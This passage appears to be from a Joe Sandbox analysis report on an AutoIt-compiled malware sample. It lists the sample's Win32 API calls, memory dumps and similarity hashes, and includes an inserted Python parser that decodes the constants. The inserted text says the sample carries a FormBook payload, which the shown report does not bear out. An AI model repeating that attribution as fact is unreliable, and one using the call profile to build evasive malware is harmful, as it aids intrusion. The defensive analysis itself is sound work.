                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00471CF7
                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 00471D05
                                                                                                                                                                  • GetSystemMetrics.USER32(00000007), ref: 00471D0D
                                                                                                                                                                  • GetSystemMetrics.USER32(00000008), ref: 00471D20
• GetSystemMetrics.USER32(00000004), ref: 00471D42
• SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
• GetSystemMetrics.USER32(00000007), ref: 00471D79
• SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
• GetSystemMetrics.USER32(00000008), ref: 00471DAB
• GetSystemMetrics.USER32(00000004), ref: 00471DCF
• SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
• AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
• CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
• SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
• GetClientRect.USER32(?,?), ref: 00471E8A
• GetStockObject.GDI32(00000011), ref: 00471EA6
• SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
• SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer
• String ID: @$AutoIt v3 GUI
• API String ID: 2872485747-3359773793
• Opcode ID: 38afc10233d910aeb777c22d5c81fb6d4fd9d3b73f63716144b787bfa93c5fa7
• Instruction ID: 8cf5fd9e7b0abf2f472dad9b41bae804ea9cb1b32c1b51d65689880f1cfe2d6c
• Opcode Fuzzy Hash: 38afc10233d910aeb777c22d5c81fb6d4fd9d3b73f63716144b787bfa93c5fa7
• Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 217fe5fb5594f3cd53023db848c5bb6ff40143767b2d35dcfd7bebbdd5a9bbf5
• Instruction ID: 62dae473257cc2caee0a49c5626d46440081d624880130feb25903cd50123649
• Opcode Fuzzy Hash: 217fe5fb5594f3cd53023db848c5bb6ff40143767b2d35dcfd7bebbdd5a9bbf5
• Instruction Fuzzy Hash: 84C128727002046BE724CFA8DC46FAFB7A4EF55311F00416AFA05DA2C1EBB99909C795
APIs
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: Window
• String ID: 0
• API String ID: 2353593579-4108050209
• Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
• Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
• Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
• Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
APIs
• GetSysColor.USER32(0000000F), ref: 0044A05E
• GetClientRect.USER32(?,?), ref: 0044A0D1
• SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
• GetWindowDC.USER32(?), ref: 0044A0F6
• GetPixel.GDI32(00000000,?,?), ref: 0044A108
• ReleaseDC.USER32(?,?), ref: 0044A11B
• GetSysColor.USER32(0000000F), ref: 0044A131
• GetWindowLongW.USER32(?,000000F0), ref: 0044A140
• GetSysColor.USER32(0000000F), ref: 0044A14F
• GetSysColor.USER32(00000005), ref: 0044A15B
• GetWindowDC.USER32(?), ref: 0044A1BE
• GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
• GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
• GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
• GetPixel.GDI32(00000000,?,?), ref: 0044A21D
• ReleaseDC.USER32(?,00000000), ref: 0044A229
• SetBkColor.GDI32(?,00000000), ref: 0044A24C
• GetSysColor.USER32(00000008), ref: 0044A265
• SetTextColor.GDI32(?,00000000), ref: 0044A270
• SetBkMode.GDI32(?,00000001), ref: 0044A282
• GetStockObject.GDI32(00000005), ref: 0044A28A
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
• String ID:
• API String ID: 1744303182-0
• Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
• Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
• Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
• Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
APIs
• GetForegroundWindow.USER32(?,?,?,?,?,?,?), ref: 0046EE79
• GetForegroundWindow.USER32(?,?,?,?,?,?), ref: 0046F265
• IsWindow.USER32(?), ref: 0046F29A
• GetDesktopWindow.USER32 ref: 0046F356
• EnumChildWindows.USER32(00000000), ref: 0046F35D
• EnumWindows.USER32(0046130D,?), ref: 0046F365
Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: Window$EnumForegroundWindows$ChildDesktop
• String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
• API String ID: 4293069593-1919597938
• Opcode ID: 7eb0f3ae9a0304a5d069b7ca5d1222961736e80184ced8954434bc01324a9774
• Instruction ID: 15289122aec5319afe5b60ce0d71565fabc5791e0031d8771947120ab82528ab
• Opcode Fuzzy Hash: 7eb0f3ae9a0304a5d069b7ca5d1222961736e80184ced8954434bc01324a9774
• Instruction Fuzzy Hash: 83F10B714143019BDB00FF61D885AAFB3A4BF85308F44496FF94567282E779E909CBA7
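The per-function "APIs" listings above are the most useful part of these records for triage: the CreateWindowExW call with the window class "AutoIt v3 GUI" is what tells you the sample is an AutoIt-compiled wrapper (the FormBook payload sits inside it), and the raw hex arguments hide Win32 constants that are easier to read once decoded. The parser below is an added example, not Joe Sandbox code and not part of this report; it works on the listing layout shown on this page (bullet, API.MODULE(args), "ref:" address) and its regex is an assumption about that layout. The sample input is constructed from lines that appear in the records above, and the constant names are the standard Win32 SDK names for the values shown.

```python
import re
from collections import Counter

# Constructed sample in the layout of the report's "APIs" listings; the
# individual lines are copied from records on this page.
SAMPLE = """\
APIs
• GetSystemMetrics.USER32(00000004), ref: 00471D42
• SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
• CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
• SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
• GetStockObject.GDI32(00000011), ref: 00471EA6
• SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
• GetDesktopWindow.USER32 ref: 0046F356
• SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
Strings
"""

# Assumed line layout: "• Api.MODULE(arg,arg,...), ref: XXXXXXXX"; the
# argument list (and its trailing comma) is absent for some calls.
API_LINE = re.compile(
    r"^\s*•\s*(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Win32 SDK names for the positive constants seen in these listings,
# keyed by (API name, zero-based argument index).
KNOWN = {
    ("GetSystemMetrics", 0): {4: "SM_CYCAPTION", 7: "SM_CXDLGFRAME", 8: "SM_CYDLGFRAME"},
    ("SystemParametersInfoW", 0): {0x30: "SPI_GETWORKAREA"},
    ("GetStockObject", 0): {5: "NULL_BRUSH", 17: "DEFAULT_GUI_FONT"},
    ("SendMessageW", 1): {0x30: "WM_SETFONT"},
    ("GetSysColor", 0): {5: "COLOR_WINDOW", 8: "COLOR_WINDOWTEXT", 15: "COLOR_3DFACE"},
    ("SetBkMode", 1): {1: "TRANSPARENT"},
}


def _parse_arg(tok):
    """'?' -> None (unresolved), 8 hex digits -> int, anything else -> literal string."""
    tok = tok.strip()
    if tok == "?":
        return None
    if re.fullmatch(r"[0-9A-Fa-f]{8}", tok):
        return int(tok, 16)
    return tok


def parse_api_listing(text):
    """Return one dict per API reference line: api, module, args, ref."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue  # section headers such as "APIs" / "Strings"
        raw = m.group("args")
        args = [_parse_arg(a) for a in raw.split(",")] if raw and raw.strip() else []
        calls.append({"api": m.group("api"), "module": m.group("module"),
                      "args": args, "ref": int(m.group("ref"), 16)})
    return calls


def decode_constant(api, index, value):
    """Symbolic name for a known constant, or None."""
    return KNOWN.get((api, index), {}).get(value)


def window_classes(calls):
    """Window class names passed to CreateWindowEx* (2nd argument), e.g. 'AutoIt v3 GUI'."""
    return [c["args"][1] for c in calls
            if c["api"].startswith("CreateWindowEx")
            and len(c["args"]) > 1 and isinstance(c["args"][1], str)]


def module_counts(calls):
    return Counter(c["module"] for c in calls)


def annotate(calls):
    """Human-readable lines with decoded constants, e.g. 'GetStockObject(DEFAULT_GUI_FONT) @ 0x471ea6'."""
    out = []
    for c in calls:
        parts = []
        for i, a in enumerate(c["args"]):
            if a is None:
                parts.append("?")
            elif isinstance(a, int):
                parts.append(decode_constant(c["api"], i, a) or f"0x{a:x}")
            else:
                parts.append(repr(a))
        out.append(f'{c["api"]}({", ".join(parts)}) @ 0x{c["ref"]:x}')
    return out


if __name__ == "__main__":
    calls = parse_api_listing(SAMPLE)
    print("\n".join(annotate(calls)))
    print("window classes:", window_classes(calls))
    print("modules:", dict(module_counts(calls)))
```

One caveat when reading these listings: arguments such as 000000EB for SetWindowLongW and 000000F0 for GetWindowLongW are most likely sign-extended byte immediates that the listing prints unsigned (-21 = GWL_USERDATA, -16 = GWL_STYLE); the decoder above does not guess at those, because a value in that range can also be a genuine positive constant.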
APIs
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
• RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
• RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseConnectCreateRegistry
                                                                                                                                                                  • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                                  • API String ID: 3217815495-966354055
                                                                                                                                                                  • Opcode ID: 4e8270c5edde0ca8bc7351f5e59e790f56017af10183f1cc1b4432f724b8c6fd
                                                                                                                                                                  • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                                                                                                                                                                  • Opcode Fuzzy Hash: 4e8270c5edde0ca8bc7351f5e59e790f56017af10183f1cc1b4432f724b8c6fd
                                                                                                                                                                  • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadIconW.USER32(?,00000063), ref: 0045464C
                                                                                                                                                                  • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                                                                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 00454678
                                                                                                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 00454690
                                                                                                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 00454697
                                                                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                                                                                                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                                                                                                                                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                                                                                                                                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 004546F5
                                                                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 00454765
                                                                                                                                                                  • GetDesktopWindow.USER32 ref: 0045476F
                                                                                                                                                                  • GetWindowRect.USER32(00000000), ref: 00454776
                                                                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 004547D2
                                                                                                                                                                  • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                                                                                                                                                                  • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3869813825-0
                                                                                                                                                                  • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                                                                                                                                  • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
                                                                                                                                                                  • Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                                                                                                                                  • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
                                                                                                                                                                  APIs
                                                                                                                                                                  • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                                                                                                                                                                  • GetFocus.USER32 ref: 0046A0DD
                                                                                                                                                                  • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                                                                                                                                                                  • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessagePost$CtrlFocus
                                                                                                                                                                  • String ID: 0
                                                                                                                                                                  • API String ID: 1534620443-4108050209
                                                                                                                                                                  • Opcode ID: 70ffeecb0d74d45a8ada8319ec647cc993707ad6458148b4a2a519c1a340f22a
                                                                                                                                                                  • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                                                                                                                                                                  • Opcode Fuzzy Hash: 70ffeecb0d74d45a8ada8319ec647cc993707ad6458148b4a2a519c1a340f22a
                                                                                                                                                                  • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                                                                                                                                                                  APIs
                                                                                                                                                                  • DestroyWindow.USER32(?), ref: 004558E3
                                                                                                                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$CreateDestroy
                                                                                                                                                                  • String ID: ,$tooltips_class32
                                                                                                                                                                  • API String ID: 1109047481-3856767331
                                                                                                                                                                  • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                                                                                                                                  • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                                                                                                                                                                  • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                                                                                                                                  • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                                                                                                                                                                  • GetMenuItemCount.USER32(?), ref: 00468C45
                                                                                                                                                                  • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                                                                                                                                                                  • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                                                                                                                                                                  • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                                                                                                                                                                  • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                                                                                                                                                                  • GetMenuItemCount.USER32 ref: 00468CFD
                                                                                                                                                                  • SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
                                                                                                                                                                  • GetCursorPos.USER32(?), ref: 00468D3F
                                                                                                                                                                  • SetForegroundWindow.USER32(?), ref: 00468D49
                                                                                                                                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                                                                                                                                                                  • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
• String ID: 0
• API String ID: 1441871840-4108050209
• Opcode ID: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
• Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
• Opcode Fuzzy Hash: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
• Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
APIs
• LoadLibraryW.KERNEL32(USER32.DLL,00496840,00000314,00000000), ref: 004200D7
• GetProcAddress.KERNEL32(00000000,MessageBoxW), ref: 004200F3
• GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00420111
• GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00420121
• GetProcAddress.KERNEL32(00000000,GetUserObjectInformationW), ref: 00420131
• GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 00420145
Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: AddressProc$LibraryLoad
• String ID: @hI$GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationW$MessageBoxW$USER32.DLL
• API String ID: 2238633743-2115754596
• Opcode ID: 7f62eed91bd5e8d9e4a5aee0760a84f379abbf056fbeb696d11cc0b2488c1ccd
• Instruction ID: 87ede4d0b4904396a69794b8bbcc3e401081f17338994847c77f403133c188a5
• Opcode Fuzzy Hash: 7f62eed91bd5e8d9e4a5aee0760a84f379abbf056fbeb696d11cc0b2488c1ccd
• Instruction Fuzzy Hash: 2F411C71A0031AABDB10ABB5AD89E6F7BF8AB54340F54043BA905E2351DB79D910CB68
APIs
• GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
• GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
